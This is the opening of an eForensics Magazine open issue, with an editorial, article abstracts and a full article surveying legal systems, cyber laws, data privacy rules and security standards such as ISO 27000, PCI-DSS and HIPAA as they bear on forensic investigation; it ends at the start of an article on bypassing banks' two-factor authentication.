
CYBERCRIME AND CYBERSECURITY


TEAM

Editor: Joanna Kretowicz [email protected]
Betatesters/Proofreaders: Olivier Caleff, Kishore P.V., Johan Scholtz, Mark Dearlove, Massa Danilo, Andrew J. Levandoski, Robert E. Vanaman, Tom Urquhart, M1ndl3ss, Henrik Becker, James Fleit, Richard C. Leitz Jr
Senior Consultant/Publisher: Paweł Marciniak
CEO: Ewa Dudzic [email protected]
Marketing Director: Joanna Kretowicz [email protected]
Art Director: Ireneusz Pogroszewski [email protected]
DTP: Ireneusz Pogroszewski
Publisher: Hakin9 Media Sp. z o.o. SK, 02-676 Warszawa, ul. Postępu 17D, Phone: 1 917 338 3631, www.eforensicsmag.com

DISCLAIMER! The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

Dear Readers,

We are pleased to present our new OPEN issue of eForensics Magazine, "CyberCrime and CyberSecurity", with open access, so that everybody interested in the subject is able to download it free of charge. This edition was carefully prepared to present our Magazine to a wider range of readers. We hope that you will enjoy reading it and that the subjects covered in this issue will help you stay updated and aware of all possible pitfalls!

This particular edition focuses on the importance of legal and regulatory aspects for cybersecurity and cybercrime. You cannot overestimate the importance and necessity of eForensic analysis in a society where the Internet represents the biggest ongoing change in our lifetime. We use forensic analysis for the purpose of crime investigation; but to do that effectively we should understand which laws and regulations have been broken. It is crucial to understand what legal systems exist, the types of law, standards, types of cybercrime, the part played by the computer system and, of course, how one can apply this knowledge.

Additionally, we will cover the topic of CSA STAR Certification, an effective way of evaluating and comparing cloud providers. Technological developments, constricted budgets, and the need for flexible access have led to an increase in business demand for cloud computing. Many organizations are wary of cloud services due to apprehensions around security issues. eForensics Magazine, in cooperation with BSI GROUP, prepared an excellent workshop where you can master the knowledge required to get CSA STAR Certification.

What's more – we added one article from our "Packet Analysis" workshop as a trial. More materials can be found at http://eforensicsmag.com/course/packetanalysis/.

Read our new issue and get all the answers you were looking for! We would like to thank you for your interest and support, and invite you to follow us on Twitter and Facebook, where you can find the latest news about our magazine and great contests. Do you like our magazine? Like it, share it! We appreciate your every comment and would be pleased to know your expectations towards our magazine. Keep your information safe, and do not forget to send us your feedback. Your opinion is important to us!

Valeriia Vitynska
eForensics Assistant Manager and eForensics Team

CYBERCRIME AND CYBERSECURITY – THE LEGAL AND REGULATORY ENVIRONMENT
by Iana Fareleiro and Colin Renouf
In this article we will look at the environment in which eForensics exists: the legal and regulatory regimes in which systems and cyber criminals operate. We perform forensic analysis on systems to investigate a crime and hopefully prosecute a criminal; but to do that we need to understand which laws and regulations have been broken. There are pitfalls in working out what laws and regulations are in operation for a particular context; what is illegal in one regime may not be in another, and is it the law in the location of the system or of the criminal that applies? The information here forms the underlying legal knowledge in the CISSP certification and underpins the International Information Systems Security Certification Consortium (ISC)2 body of knowledge.

ARE 2 FACTOR AUTHENTICATIONS ENOUGH TO PROTECT YOUR MONEY? TARGETING ITALIAN BANKS AND CUSTOMERS
by Davide Cioccia and Senad Aruch
During the last few years, banks and other financial institutions have been trying to prevent fraud and cyber-attacks from compromising their customers' credentials. They increased security and login factors to avoid these kinds of problems. One of these is Two Factor Authentication (2FA), used to "help" the username and password protect the bank account.

AN OVERVIEW OF CLOUD FORENSICS
by Dejan Lukan
When discussing cloud forensics, we're actually talking about the intersection between cloud computing and network forensic analysis. Cloud computing basically refers to a network service that we can interact with over the network; this usually means that all the work is done by a server somewhere on the Internet, which might be backed by physical or virtual hardware. In recent years, there has been a significant increase in the use of virtualized environments, which makes it very probable that our cloud service is running somewhere in a virtualized environment.

AUTHENTICATING REMOTE ACCESS FOR GREATER CLOUD SECURITY
by David Hald, co-founder, chief relation officer
The nature and pace of business have changed as technology has opened new possibilities for organizations. One of these possibilities is cloud services, which benefit companies by enabling remote access to data stored offsite. Its convenience has made cloud services incredibly popular, both to business and malicious actors. With so much data at stake, the rise in the use of remote access necessitates ironclad security. Authenticating the identities of users remotely accessing these resources has never been more critical.

PACKET ANALYSIS WITH WIRESHARK AND PCAP ANALYSIS TOOLS
by Eric A. Vanderburg
Almost every computer today is connected. Their communication with others takes the form of packets, which can be analyzed to determine the facts of a case. Packet sniffers are also called network analyzers, as they help in monitoring every activity performed over the Internet. The information from packet sniffing can be used to analyze the data packets and uncover the source of problems in the network. The important feature of packet sniffing is that it captures data that travels through the network, irrespective of the destination. A log file is generated at the end of every operation performed by the packet sniffer, containing the information related to the packets.
UNDERSTANDING DOMAIN NAME SYSTEM
by Amit Kumar Sharma
DNS spoofing, also referred to as DNS cache poisoning in the technical world, is an attack wherein junk (customized data) is added into the Domain Name System name server's cache database, causing it to return incorrect data and thereby diverting traffic to the attacker's computer.

CSA CERTIFICATION OFFERS SIMPLE, COST EFFECTIVE WAY TO EVALUATE AND COMPARE CLOUD PROVIDERS
by John DiMaria
Technological developments, constricted budgets, and the need for flexible access have led to an increase in business demand for cloud computing. Many organizations are wary of cloud services, however, due to apprehensions around security issues. Ernst & Young conducted a survey of C-level leaders in 52 countries which showed a unified concern over the accelerated rate at which companies are moving information to the cloud and the subsequent demise of physical boundaries and infrastructure.

ROAD MAP TO CSA STAR CERTIFICATION – OPTIMIZING PROCESSES, REDUCING COST AND MEETING INTERNATIONAL REQUIREMENTS
by John DiMaria
For centuries, the Swiss dominated the watchmaking industry, and their national identity was somewhat tied to their expertise in the precision mechanics required to make accurate timepieces. Yet the Swiss were so passionate about their expertise that they hesitated to embrace the new technology in watchmaking with batteries and quartz crystals. With Japan's introduction of the quartz wristwatch in 1969, the majority Swiss market share dropped from 80% at the end of World War II to only 10% in 1974 (Aran Hegarty, Innovation in the Watch Industry, Timezone.com, November 1996, http://people.timezone.com/library/archives/archives0097). Ironically, it was the Swiss who had invented the quartz watch but failed to see its potential.

SUPPLY CHAIN MANAGEMENT USING CSA STAR CERTIFICATION
by John DiMaria
When an organization adopts cloud services, it is in fact expanding its operations from a local or regional presence to a more global one. As a result, the corresponding organizational operations strategy needs to be adjusted to align with these changes. A more formal analysis of the supply chain as part of a more comprehensive due diligence review also needs to be considered. (By definition, the Cloud Controls Matrix (CCM) is a baseline set of security controls created by the Cloud Security Alliance to help enterprises assess the risk associated with a cloud computing provider.)

CONTINUOUS MONITORING – CONTINUOUS AUDITING/ASSESSMENT OF RELEVANT SECURITY PROPERTIES
by John DiMaria
While the Cloud Security Alliance's (CSA) STAR Certification has certainly raised the bar for cloud providers, any audit is still a snapshot of a point in time. What goes on between audits can still be a blind spot. To provide greater visibility, the CSA developed the Cloud Trust Protocol (CTP), an industry initiative which will enable real-time monitoring of a CSP's security properties, as well as providing continuous transparency of services and comparability between services on core security properties (Source: CSA CTP Working Group Charter). This process is now being further developed by BSI and other industry leaders. CTP forms part of the Governance, Risk, and Compliance stack and the Open Certification Framework as the continuous monitoring component, complementing the point-in-time assessments provided by STAR certification and STAR attestation. CTP is a common technique and nomenclature to request and receive evidence and affirmation of current cloud service operating circumstances from CSPs.

CYBERCRIME AND CYBERSECURITY – THE LEGAL AND REGULATORY ENVIRONMENT
by Iana Fareleiro and Colin Renouf

eForensic analysis becomes essential and necessary in a society where the Internet represents the biggest ongoing change in our lifetime. It takes place as a result of a crime or investigation. However, what is relevant and worth searching for, or even what can be legally analyzed, depends on the legal systems and regulations, the criminal and, maybe, even the customers or users affected.

What you will learn: In this article we will look at the environment in which eForensics exists: the legal and regulatory regimes in which systems and cyber criminals operate. We perform forensic analysis on systems to investigate a crime and hopefully prosecute a criminal; but to do that we need to understand which laws and regulations have been broken. There are pitfalls in working out what laws and regulations are in operation for a particular context; what is illegal in one regime may not be in another, and is it the law in the location of the system or of the criminal that applies? The information here forms the underlying legal knowledge in the CISSP certification and underpins the International Information Systems Security Certification Consortium (ISC)2 body of knowledge.

The laws broken may be existing laws pertaining to theft or threats of violence where the computer systems are central, or the computer system may be on the periphery of the crime, or it may be specific information systems or computer privacy laws and regulations that are relevant; possibly even a combination of all of them. These laws and regulations may conflict, and what is illegal in one country or region may not be illegal in another.

As cyber security experts, we need to understand what we are aiming to prove and what data we can legally investigate before we begin our work.

In addition to existing laws within the legal systems at work, specific cyber laws were created to protect individuals, companies and governments against cyber crime; these can be divided into three categories:

• Computer-assisted crime is where a computer is used as a tool to assist in committing a crime,
• Computer-targeted crime happens when a computer was the main target and victim of an attack,
• The last category includes situations where the computer happens to be involved in a crime but is neither the attacker nor the attacked, and is peripheral to the crime itself.

These categories were created to facilitate the law enforcement of cyber crimes. Laws can be general and include numerous scenarios, instead of specific laws needing to be created for each individual case.

The idea is to use the existing laws for any crime where possible, allowing an easier understanding of the basis for prosecution for all people involved, including the judge and jury, who can then provide the verdict and sentence based on existing guidelines and standards.

The downside of introducing specific cyber laws is that, for example, when companies are attacked they just want to ensure that the vulnerability exposed is fixed and to avoid any embarrassment that would adversely affect the company's reputation. Even when information about an attack leaks out, companies do not seem interested in spending time and money in the courts, preferring to minimize the period of embarrassment. This is the main reason why cyber criminals go unpunished and easily get away with such illegal actions. Not many companies wish to be known as the victim of a cyber attack, since that can adversely influence customer confidence and scare away investors.

LEGAL SYSTEMS
There are essentially four different models of legal systems: civil law, common law, religious law, and customary law.

CIVIL LAW
In civil law, employed by most countries, a legislative branch of the government develops and documents statutes and laws, and then a judiciary has some latitude for interpreting them. The legislation is prescriptive, so legal precedence, whilst existing, has little force. In some such systems, such as that derived from Roman law or the later 'Napoleonic code', the judge assesses the proof as a measure of guilt of the criminal.

COMMON LAW
This system, used in the UK, US, Canada, Australia and other former British colonies amongst others, is often derived from the English legal system. A legislative branch of government still produces statutes and laws, but great emphasis is placed on judicial interpretation, precedent and existing case law, which can even override and supersede the legislation and statute if a conflict is found to occur. Thus, time is important in this system, as judicial interpretation may develop, and traditional interpretation of custom and "natural" law acts as a basis for the system. The judiciary and its interpretation of the legislation and of precedent in existing case law has a greater role in this system than in the civil law system. In the English legal system and its derivatives, the role of the jury in interpreting the evidence when assessing the burden of proof is common.

RELIGIOUS LAW
In religious law, such as Sharia law adopted by several Islamic countries and groups, religious texts and doctrine provide the basis for the legal system, rather than separate statute and legislation. Here the given religion is accepted by the majority of the people or their rulers, such that its doctrines essentially become laws by which the people abide. The laws enforced may be interpreted from the appropriate religious texts by religious leaders, such as imams or ayatollahs.

CUSTOMARY LAW
In this model, existing regional customs accepted by the majority of the people over a period of time provide the basis for the legal system, to the extent that they essentially become laws by which the people abide. These customs may later be codified to some extent. This model is seen within the other legal models in "duty of care" and "best practice" interpretation, where what would be expected of a "reasonable man" acts as a measure; such as in the tort law of the civil law branch of common law.

TYPES OF LAWS
Within common law itself, civil law plays a part, alongside criminal law, tort law and administrative law.
As groups of countries collaborate, such as in the European Union (EU), the combinations become more complex, but the types of law are common at the core due to the prevalence of the English legal system and its derivatives in the UK, US, Australia, etc.

CRIMINAL LAW
In criminal law the aim is the maintenance of law and order for the common citizen and the deterrence of criminals by punishing offenders; so, from the view of prosecution, the victim of the crime is considered to be society itself, even though the actual victim may be a person or persons. Hence the existence of the Crown Prosecution Service (CPS) in the UK for pursuing the criminal through the courts under criminal law, with

an aim to remove the offender from affecting society. The criminal is incarcerated, or even deprived of his or her life under some circumstances, so there is an emphasis on the burden of proof being "beyond reasonable doubt".

CIVIL LAW
Here the individual has been wronged and seeks legal recourse in terms of damages from a civil defendant, rather than loss of liberty, with the standard of evidence essentially reduced from "beyond all reasonable doubt" to a likelihood known as a "preponderance", i.e. more likely than not. The damages for the wrongdoing may be statutory as prescribed by law, compensatory to attempt to balance loss or injury, or punitive to discourage and deter future legal violation.

TORT LAW
This is a branch of civil law related to wrongdoing against an individual measured against "best practice" or "duty of care", where the action taken, or the negligence of responsibility, of an individual or organization is considered to be outside the bounds of behavior expected of a "reasonable, right thinking, or prudent man"; in this it relates back to custom, and often may change over time. Here again, the burden of proof rests on the preponderance of the evidence weighing against the defendant. This is the largest source of lawsuits and damages under major legal systems.

This is particularly important in the realm of cyber security laws. In protecting customer data, the "Prudent Man Rule" is applied to set the bar for duty of care in terms of what processes, infrastructure and practices a right thinking person would consider necessary as a minimum. If a business is seen to fall below that bar of expectation, then the organization and business stakeholders are considered negligent in providing the necessary due care to protect its customers, assets and business stakeholders.

A company has to exercise due diligence continuously in reviewing its own and third party partners and processes to ensure that the necessary standard of due care is being met. As the technologies and threats in the industries adapt all of the time, due diligence ensures the minimum bar changes accordingly. Whenever a new third party is brought into a company's processes, the necessary due diligence must be performed in assessing that party for past criminal history, threats, and its own due care protection standards and due diligence processes.

CONTRACT LAW
Agreements between companies and individuals can be broken, whether verbal or documented in writing, and damages for the wrongdoing can be sought. This is again a type of civil law.

ADMINISTRATIVE AND REGULATORY LAW
This covers governance, compliance and regulatory laws relating to government and government agencies. Governments enact these laws with less influence from the judiciary. Compliance laws, such as Sarbanes-Oxley, come under this branch of the legal system.

INTELLECTUAL PROPERTY LAWS
One of the targets in many cyber crimes is stealing intellectual property, so companies go to great technical and legal lengths to protect it. Whilst intellectual property isn't physical in nature, companies require creativity and then investment to capitalize on it. It takes a number of forms, from trademarks, copyright, licenses and patents to the simple trade secrets that a company entrusts to its staff.

A trademark is a name, image or logo for a brand that is used in marketing and is associated with a brand by its customers and competitors; it may be formally registered or unregistered.
Whilst stealing the logo itself is not usually a major criminal target, in phishing attacks a logo may be used to misrepresent the cyber criminal's web site as that of the company owning the brand.

Copyright is the right of an owner of a musical, artistic or literary work to own, duplicate, distribute and amend that work themselves. Often cyber criminals will duplicate a copyrighted work and sell it or provide it for download as their own property.

A patent is a legal agreement protecting the use of an idea or invention such that the patent holder has exclusive rights to the use and licensing of that idea for a period of time covered by the patent. Some rogue nations and cyber criminals will ignore the patent and use the invention or idea as their own,

and legal recourse is then required by the patent holder to obtain compensation.

A license is a contract between a vendor and a consumer or business to use software within the bounds of an "end user license agreement", and not to duplicate, modify, redistribute or sell on that software.

A trade secret is proprietary information belonging to a business in a competitive market that its staff and third parties should not divulge, and is often subject to a non-disclosure agreement (NDA), a contract between the business and a third party or employee not to divulge that secret. The business must exercise due care to protect that trade secret.

DATA PRIVACY LAWS
With the rise in cyber crime, and the stealing of customer data being a regular objective of the cyber criminal, most countries and states have introduced their own data protection laws. These cover the processes and expected standard behavior for protecting data, but often also include clauses as to where that data can be located, and with which countries and under what circumstances it can be shared.

In the US, the Privacy Act of 1974 protects the data held by the US government on its citizens, and how it is collected, transferred between departments, and used; individuals have legal recourse in being able to request access to the data held about them, with national security providing the main limitation to that access. Similarly, in the European Union the EU Data Protection Directive sets the boundaries on the collection and flow of personal data between member nations, with a fine line between the needs of commerce between different member nations and the privacy of the individual. The EU principles are considered more stringent than those of the US, so the EU-US Safe Harbor legal framework allows EU data to be shared with US organizations if they adhere to the more stringent EU Data Protection Directive principles. The EU Data Protection Directive principles are:

• Individuals must be notified how their personal data is collected and used
• Individuals must be able to opt out of sharing their data with third parties
• Individuals must opt in to the sharing of sensitive personal data
• Reasonable protections must be in place to protect the personal data

This latter rule brings in the duty of care legal measure.

Title 18, Section 1030 of the United States Code, usually known as the Computer Fraud and Abuse Act, defines the circumstances in which systems in government and commercial organizations are considered to have been attacked, and the recourse against the criminal. This was amended by the Patriot Act of 2001, as a response to the September 11th attacks, to allow easier implementation of wiretaps by law enforcement agencies and easier sharing of data between those agencies, along with more stringent punishment for damaging a protected system from the original act or dealing with individuals on the sanctions list. The Identity Theft Act further amends the original act to provide additional protection for the individual.

STANDARDS
International bodies, industries, and some groups of companies may produce their own standards with which individuals and companies may comply; claiming such compliance may be a requirement for taking part in that industry from a financial or regulatory perspective, or may be required as part of a contract.
So, companies supporting payments with debit and credit cards usually have to adhere to the PCI-DSS standards mandated by the card industry vendors, and health service vendors in the US must deliver to HIPAA data security standards for patient data as mandated by US administrative law.

In the early days of networked IT (1995), the British Standards Institute started to develop BS7799, which outlines how an information security management system should be designed, built and maintained, with guidelines on what is necessary in the form of policies and processes, along with the technologies necessary to holistically protect sensitive information from the physical, to the network, to the electronic. From this the ISO/IEC 27000 standards were developed, using an iterative process where objectives and plans are formed (Plan), then implemented (Do), the results measured to see if the objectives were met (Check), and then amendments made as necessary (Act) – the whole iterative process is known as the PDCA cycle.

ISO27000
The ISO and International Electrotechnical Commission (IEC) standards bodies jointly issue the ISO27000 Information Technology – Security Techniques family of standards for information security management best practice for risks and controls; this was, as mentioned, derived from the earlier BS7799 British Standard and the later ISO/IEC 17799 standard. These bodies have a committee called Joint Technical Committee 1 (JTC 1) Subcommittee 27 (SC27) that meets twice a year to consider and ratify the standards and amendments to provide the "information security management system" (ISMS), with the 27000 base standard providing an overview of the complete family of policy-oriented standards and the vocabulary used throughout. The individual standards are as follows:

ISO/IEC Standard – Description
27000 – Information security management systems – Overview and vocabulary
27001 – Information security management systems – Requirements
27002 – Code of practice for information security management
27003 – Information security management system implementation guidance
27004 – Information security management – Measurement
27005 – Information security risk management
27006 – Requirements for bodies providing audit and certification of information security management systems
27007 – Guidelines for information security management systems auditing
27008 – Guidance for auditors on ISMS controls
27010 – Information security management for inter-sector and inter-organizational communications
27011 – Information security management guidelines for telecommunications organizations based on ISO/IEC 27002
27013 – Guideline on the integrated implementation of ISO/IEC 27001 and ISO/IEC 20000-1
27014 – Information security governance
27015 – Information security guidelines for financial services
27017 – Information security management for cloud systems
27018 – Data protection for cloud systems
27019 – Information security management guidelines based on ISO/IEC 27002 for process control systems specific to the energy utility industry
27031 – Guidelines for information and communication technology readiness for business continuity
27032 – Guideline for cybersecurity
27033 – IT network security, a multi-part standard based on ISO/IEC 18028:2006
27033-1 – Network security – Part 1: Overview and concepts
27033-2 – Network security – Part 2: Guidelines for the design and implementation of network security
27033-3 – Network security – Part 3: Reference networking scenarios – Threats, design techniques and control issues
27033-5 – Network security – Part 5: Securing communications across networks using Virtual Private Networks (VPNs)
27034-1 – Application security – Part 1: Guidelines for application security
27035 – Information security incident management
27036 – Information security for supplier relationships
27036-3 – Information security for supplier relationships – Part 3: Guidelines for information and communication technology supply chain security
27037 – Guidelines for identification, collection, acquisition and preservation of digital evidence
27038 – Specification for redaction of digital documents
27039 – Intrusion detection and protection systems
27040 – Guideline on storage security
27041 – Assurance for digital evidence investigation methods
27042 – Analysis and interpretation of digital evidence
27043 – Digital evidence investigation principles and processes
27799 – Information security management in health using ISO/IEC 27002

These aren't laws, but many contracts will insist that participants adhere to the complete body of the standard, or to its individual components. Adherence to the standard or its components can also be used as a quality measure and can act as a selling point, which can be important in negotiations. Therefore, this standard can appear in the enacting of contract law.

The individual components cover investigation and forensic analysis, as well as relationships with third parties. However, one of the key areas where the standard impacts the legal environment for cyber security is in the influence it has had on other standards and regulations that can be enforced as the cost of doing business in some industries, e.g. PCI-DSS for companies involved in credit card sales. When compliance is being evaluated, or where criminal responsibility is being assessed, ISO/IEC 27000 provides a basis by which what is expected of the "reasonable man" can be measured from a legal perspective.

INFORMATION TECHNOLOGY INFRASTRUCTURE LIBRARY (ITIL)
ITIL, like the foundations of ISO/IEC 27000, was developed by the UK government, with the aim of standardizing and documenting service management and aligning IT with the business through a common language. IT should provide good customer service to the business it serves. Whilst not providing a security framework, it does cover support, change and maintenance processes and all of the foundations for business continuity and disaster recovery management, with great strength in incident management.

It covers supplier management, service level management, service catalog management, availability management, incident management, event management, problem management, change management, knowledge management, release and deployment management, service testing and validation, and the requirements of a configuration management system. It has processes for service design, service operation and service transition. Across all of this is continual process improvement as a result of service reporting and service measurement. At the core of ITIL is the concept of IT as a service.

Again, ITIL is referenced in contracts and often used as a selling point, but in the legal world outside of contracts it is more useful as a measure of the expectations for the "reasonable man".

CONTROL OBJECTIVES FOR INFORMATION AND RELATED TECHNOLOGIES (COBIT)
This was produced by the Information Systems Audit and Control Association in 1996 as a general framework of processes, policies, and governance for the management of IT as a whole, not just security; the current version aligns with the ITIL and ISO27000 standards to provide a full framework and model for IT as the basis of a capability maturity model.

It splits IT into domains: Plan and Organize; Acquire and Implement; Deliver and Support; and Monitor and Evaluate. Across these it includes a framework, process descriptions, control objectives, management guidelines, and maturity models.

Whilst ISO27000 provides high level guidelines and processes, the COBIT model contains specific details, such as for user access management and compliance, and how to work with third parties; it has a lot of helpful security details, particularly in the Plan and Organize and Acquire and Implement domains, with the processes heavily emphasized in the other two domains.

Again, as with ISO/IEC 27000, COBIT is often referenced as a selling point or in contracts, but it also provides specific processes that tie up with the "reasonable man" assessment from a legal perspective.
PAYMENT CARD INDUSTRY DATA SECURITY STANDARD (PCI-DSS)
The major card companies (e.g. Visa, MasterCard, American Express, JCB, etc.) got together in 2006 to come up with a set of standards for data security that could be measured and enforced for companies wishing to participate in payment card processing. Annually, a Qualified Security Assessor (QSA) creates a report on compliance with the standards, which are split into 12 requirements in 6 groups.

Control Objectives – PCI-DSS Requirements

Build and Maintain a Secure Network
1. Install and maintain a firewall configuration to protect cardholder data
2. Do not use vendor-supplied defaults for system passwords and other security parameters

Protect Cardholder Data
3. Protect stored cardholder data
4. Encrypt transmission of cardholder data across open, public networks

Maintain a Vulnerability Management Program
5. Use and regularly update anti-virus software on all systems commonly affected by malware
6. Develop and maintain secure systems and applications

Implement Strong Access Control Measures
7. Restrict access to cardholder data by business need-to-know
8. Assign a unique ID to each person with computer access
9. Restrict physical access to cardholder data

Regularly Monitor and Test Networks
10. Track and monitor all access to network resources and cardholder data
11. Regularly test security systems and processes

Maintain an Information Security Policy
12. Maintain a policy that addresses information security

The aim of the PCI-DSS standards is to ensure consistency across the card payments industry in the way that customer details, and the card data necessary for making payments, are protected and handled. It covers requirements for technology, processes and the relationships with the business and the staff involved. From a customer perspective this acts to protect customers, in that companies adhering to the PCI standards can be trusted to look after the data, and later fraud would be unexpected. Reviews of continued compliance are required of any company adopting PCI, with the QSA making an assessment and recommendations for any areas of improvement required.

So, adherence to PCI is usually contractual, which is how it relates to the law; yet again, anyone dealing with payment card data would be expected to follow the recommendations within the standard and thus fits within the "reasonable man" assessment of legal frameworks. Whilst US federal law doesn't mandate that companies adhere to PCI-DSS when dealing with card data, the laws in some states within the US and elsewhere do refer to it, so it is likely to become the law in the future. MasterCard and Visa require service providers and merchants to be validated for PCI-DSS compliance, and banks must be audited, whereas validation isn't mandatory for all entities.

HEALTH INSURANCE PORTABILITY AND ACCOUNTABILITY ACT (HIPAA)
The HIPAA act is a US federal law that covers many areas, but part of it also includes standards for data privacy that overlap with the data privacy laws in some countries, and these also tie back to the "reasonable man" rule in the gray area between law and standard. Therefore, many information security certifications (e.g. CISSP) and standards reference the act and its standards worldwide. The objective of the HIPAA regulatory framework was to provide a secure way for the health insurance of US citizens to be shared between providers when changing or losing jobs, ensuring that citizens not only had any confidential personal information or medical condition information protected physically, but also that the policies were in place to ensure their health insurance benefit position was maintained.

The act is in two parts. The first part (Health Care Access, Portability, and Renewability) covers the policies by which US citizens maintain their health insurance across providers and what their entitlement is when switching providers; as such it isn't applicable to the information security realm at the detail level.
The second part (Preventing Health Care Fraud and Abuse; Administrative Simplification; Medical Liability Reform) and its details on data privacy is more relevant to information security professionals, and it is here that granular standards exist and there is an overlap with data privacy laws elsewhere. The Privacy Rule and Security Rule subsections are key here, and the latter includes the standards. The Security Rule is split into Administrative Safeguards, Physical Safeguards and Technical Safeguards, and includes standards for encryption, checksums, etc., as well as risk management and risk assessment processes. In interpreting adherence to these process standards, the "reasonable man" rule is again brought into use from a legal perspective, as the prescriptiveness of the standards is open to interpretation and applicability at many levels.

NATIONAL INSTITUTE OF STANDARDS AND TECHNOLOGY (NIST)
This is not like the other paragraphs here, in that it refers to a standards issuing body as a whole, like the ISO/IEC or BSI bodies referenced earlier; but it is mentioned due to its issuing of very detailed build, hardening, and usage standards for IT and security that are often referenced by other standards (e.g. it is often used for best practice build and configuration standards for PCI-DSS compliance) and again acts as a yardstick for the "reasonable man" rule in assessing whether a reasonable attempt was made to secure data.

The NIST maintains an Information Technology Portal with a standard Cybersecurity Framework, Computer Security Resource Centre, and other documentation and groups: http://www.nist.gov/. The US government maintains standard configuration documents for Windows 7 and Red Hat Enterprise Linux 5 on this site that show how builds should be done. Of more interest beyond the "reasonable man" debate are the standards and guidelines for eForensic analysis.

THE PART OF THE COMPUTER SYSTEM
The computer may be a key part of the criminal or civil act, as in the breaking of cyber laws; or may be a peripheral part of the crime itself, as in electronic fraud; or may just be a part of the evidence gathering to build a picture of the crime or criminal. The legal systems and industry standards have specific definitions for the role of the computer system in these contexts.

Where the computer plays a role as a tool of the criminal, but the crime is general even though the computer is central to the commission of the crime, this is known as a "computer as tool" scenario. Stealing credit card information to commit fraud, or penetrating a system to steal company intellectual property secrets, would be examples of this scenario.

Where the crime has the computer as the primary target or "victim" of the crime, particularly where information or cyber security laws are broken, we have "computer system as target" scenarios. Hacking to install malware, deployment of computer viruses, and distributed denial of service attacks would fall into examples of this scenario.

TYPES OF CYBER CRIME
A crime being forensically investigated may break an existing law resulting from theft or a violent act; fraud using a computer is still fraud, a threat of violence online is still a threat of violence, and a computer could be used in hacking to bring about violence or death. It may also be that investigation is required for a specific cyber law that has been broken pertaining only to the use of a computer, such as hacking or denial of service for "fun" or political motivation. Finally, regulations of a legal and contractual nature may be broken using a computer; a system built for Payment Card Industry Data Security Standard compliance may be a key term in a contract, so non-compliance with the regulations leads to a contractual violation.

HOW DO WE APPLY THIS KNOWLEDGE?
To perform forensic analysis we obviously first have to protect the evidence, but knowing what evidence we are allowed to access, and what is useful, requires first understanding which laws are believed to have been broken, the role of the computer, and what laws are in place for the analyst doing the work. It isn't necessarily possible to perform forensic analysis and access the personal data of a potential criminal without breaking a privacy law.
The most difficult tasks are when the criminal is in one country or state, the target system is in another, the victim is in yet another, and multiple countries have been traversed. Even within a single country like Australia or the United States, different laws can apply from state to state. This complexity is why so many computer related crimes remain unprosecuted, along with the shame for a company in having been breached. The key to applying the legal knowledge before doing what is needed to achieve a prosecution is identifying what is common between the states and countries involved, and new international frameworks of cooperation are being drawn up to assist in this.

INTERNATIONAL LEGAL COOPERATION IN CYBER SECURITY
The increase in cyber crime and the need for coordinated anti-terrorist cooperation across state and international boundaries has led to frameworks being drawn up, such as the Safe Harbor cooperation between the EU and US. More international work between governments is currently underway to make this easier, driven initially not by basic cybercrime, but by the need to combat terrorism and terrorist funding. The trick is to identify a common subset of protections against fraud and misuse of personal data, work out from that to identify the maximum commonality between all the legal state or national entities, and then aim to prosecute in the area where the criminal is most likely to be sentenced; remembering that it is a necessity to avoid breaking the law in any of the states or nations during the forensic investigation.

Post-graduate degrees specifically covering international cyber crime and security are beginning to spring up, such as that being studied by the authors. Personal experience has shown that the specific state knowledge of experienced lawyers can come to nothing in this internationally complex area, so specializations in this niche area are likely to grow in importance.

THE INTERNATIONAL, FEDERAL AND STATE INTERPRETATION – WHICH LAWS APPLY?
In determining which laws apply to a particular scenario there are four separate considerations, which may involve different states, countries, and even international groups such as the EU. When a possible crime occurs involving a computer and data in the modern world, to work out which laws apply we must consider the location of the cyber criminal, the location of the system being attacked, the location of any victims, and the locations over which the data forming the "attack" travels.

CRIME APPLICABILITY AND INVESTIGATION – AN EXAMPLE
Consider a mobile phone payments application for purchasing foreign currency for international travellers. The user is from the UK and lands in Singapore, but uses a cellphone tower in Malaysia to enact transactions hosted on a system in Australia. Which laws apply? In this example, certain compliance restrictions on checking transactions in Malaysia and Singapore may mean that the application should use geolocation and cell tower identification to shut down, to avoid an impossible legal situation. In forensic analysis after the fact, where access to personal data might be restricted where the analysis is performed, this gets even more complex.

So, if a crime has been deemed to have occurred, consider the issue of identifying which country the crime has been committed in. Then assess which police forces or agencies will prosecute. However, taking the example of the different privacy acts enforced under EU, US, Australian, New Zealand law, etc., even sharing the evidence with the police forces can be an issue, because the personal data of the individual can only be seen by authorised agents of their own country. Often it is best to segregate the data and even store it in a location in the given country (as is required for many Chinese financial systems) to avoid the complexities; this gives the best chance of prosecuting the criminal.

WHAT HAVE WE LEARNED?
We have looked at the basic types of legal system and how they differ between countries, and the different types of laws and regulations that can be broken, with different results for the defendant or perpetrator.
We have then applied this to examples involving computers to see how complex the environment is under which cyber security experts must operate to investigate a crime, and to see which laws and regulations apply.

ABOUT THE AUTHORS
Colin Renouf is a long standing IT worker, inventor, and author; currently an Enterprise Solution Architect in the finance industry, but having worked in multiple roles and industries over a period of decades. An eternal student, Colin has studied varied subjects in addition to IT. He has written and contributed to several books and articles on subjects ranging from IT architecture, Java, dyslexia, cancer, and security; he is even referenced on one of the most fundamental patents in technology and has been involved in the search for the missing MH370 aircraft. Colin has two incredibly smart and intelligent children, Michael and Olivia, whom he loves very much. He would like to thank his co-author and best friend Iana; her lovely sister Taina, brother Tiago, mother Marciaa, and father Jose. What more is there to say, but thank you Red Bull.

Iana Fareleiro works as an analyst in a fraud and compliance team for a payments card business and is studying a post-graduate cybersecurity and cybercrime course. Originally from Brazil, and having lived in Mozambique, South Africa and Zimbabwe, and eventually Portugal, she now lives in Peterborough in the UK. She is a movie buff of old, and a scientist at heart who gets great enjoyment out of intellectual argument with like-minded individuals. She would like to thank her sister Taina, brother Tiago, mother Marciaa, and father Jose; and boyfriend Luis.

ARE 2 FACTOR AUTHENTICATIONS ENOUGH TO PROTECT YOUR MONEY? TARGETING ITALIAN BANKS AND CUSTOMERS
by Davide Cioccia and Senad Aruch

During the last few years, banks and other financial institutions have been trying to prevent fraud and cyber-attacks from compromising their customers' credentials. They increased security and login factors to avoid these kinds of problems. One of these is Two Factor Authentication (2FA), used to "help" the username and password protect the bank account.

What you will learn:
• How financial cybercrime is evolving
• How the new mobile-based security solutions are bypassed
• How the attacker can control and steal your money

What you should know:
• A basic knowledge of how two factor authentication works
• Familiarity with Android/iOS app requirements
• What a MITB attack is

